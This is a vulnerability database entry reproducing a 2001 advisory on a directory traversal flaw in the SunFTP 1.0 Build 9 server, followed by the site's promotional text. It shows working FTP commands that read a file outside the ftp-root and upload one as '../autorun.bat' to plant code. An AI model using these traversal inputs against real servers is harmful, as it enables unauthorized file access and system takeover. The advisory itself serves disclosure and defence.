Vulners
Lucene search
SunFTP 1.0 Build 9 - Unauthorized File Access
source: https://www.securityfocus.com/bid/2428/info
SunFTP is a freeware ftp server written by Rasmus J.P. Allenheim and associates for the Windows platform.
SunFTP contains a vulnerability that may allow ftp users to compromise the server. Users may be able to upload or retrieve files from outside the protected ftp-root directory.
This could allow, for example, users to place trojan horse programs on the system and gain control.
Using this vulnerability to retrieve a file from outside the ftp-root (sunftptest.txt):
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
Using this vulnerability to place a file on the target filesystem outside the ftp-root (../autorun.bat):
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2001 00:00Current
7.4High risk
Vulners AI Score7.4